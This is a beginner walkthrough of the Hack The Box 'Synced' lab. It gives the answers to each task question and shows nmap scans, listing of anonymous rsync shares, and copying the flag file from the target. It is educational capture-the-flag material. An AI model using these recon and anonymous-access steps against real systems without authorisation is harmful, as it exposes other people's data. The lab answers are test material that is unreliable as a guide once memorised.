HTB - Synced - Walkthrough

The aim of this walkthrough is to provide help with the Synced machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>

┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $

You could use the unset command to remove it after you no longer need it.

┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $

TASK 1

Question: What is the default port for rsync?

The answer I found on the internet was either the port used by the ssh connection, or tcp port 873.

873

TASK 2

Question: How many TCP ports are open on the remote host?

Scan all the tcp ports on the target machine with nmap. There appears only one open.

└──╼ $nmap -p- $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 21:53 BST
Nmap scan report for 10.129.228.37
Host is up (0.010s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT    STATE SERVICE
873/tcp open  rsync

Nmap done: 1 IP address (1 host up) scanned in 246.65 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

1

TASK 3

Question: What is the protocol version used by rsync on the remote machine?

Service/version detection can be done via the -sV option in nmap.

┌─[✗]─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap -sV -p 873 $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 22:01 BST
Nmap scan report for 10.129.228.37
Host is up (0.011s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.49 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

31

TASK 4

Question: What is the most common command name on Linux to interact with rsync?

One way would be the usage of apropos to search all and any mention of the name rsync in the installed man pages and descriptions.

┌─[✗]─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $apropos rsync
rrsync (1)           - a script to setup restricted rsync users via ssh logins
rsync (1)            - a fast, versatile, remote (and local) file-copying tool
rsync-ssl (1)        - a helper script for connecting to an ssl rsync daemon
rsyncd.conf (5)      - configuration file for rsync in daemon mode
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

rsync

TASK 5

Question: What credentials do you have to pass to rsync in order to use anonymous authentication? anonymous:anonymous, anonymous, None, rsync:rsync

Well, the hint and the answer box kinda gives it away. Otherwise, use the internet.

Then try accessing the remote machine. One important thing to note is the accessing format. Look around rsync’s man page to find out the correct addressing format.

# in the rsync man page
...
Access via rsync daemon:
           Pull:
               rsync [OPTION...] [USER@]HOST::SRC... [DEST]
...

Running the command without any options lists us the shares on the remote machine.

┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync $rhost::
public         	Anonymous Share
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

None

TASK 6

Question: What is the option to only list shares and files on rsync? (No need to include the leading – characters)

Use rsync’s built-in help option. But interestingly, running the command without any options (like in TASK 5) delivers the same results.

┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync --help
...
--list-only              list the files instead of copying them
...

Let’s try it on the target machine.

┌─[✗]─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync --list-only $rhost::
public         	Anonymous Share
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

But snooping around a bit, reveals something interesting.

┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync $rhost::public
drwxr-xr-x          4,096 2022/10/24 23:02:23 .
-rw-r--r--             33 2022/10/24 22:32:03 flag.txt
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

list-only

SUBMIT FLAG

Question: Submit root flag

Copy the file containing the flag to your local machine.

┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync $rhost::public/flag.txt ./flag.txt

Grab the flag.

┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $cat flag.txt 
<flag>
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

flag

Make sure to terminate the target box before you continue with the next machine!

SETUP#

TASK 1#

TASK 2#

TASK 3#

TASK 4#

TASK 5#

TASK 6#

SUBMIT FLAG#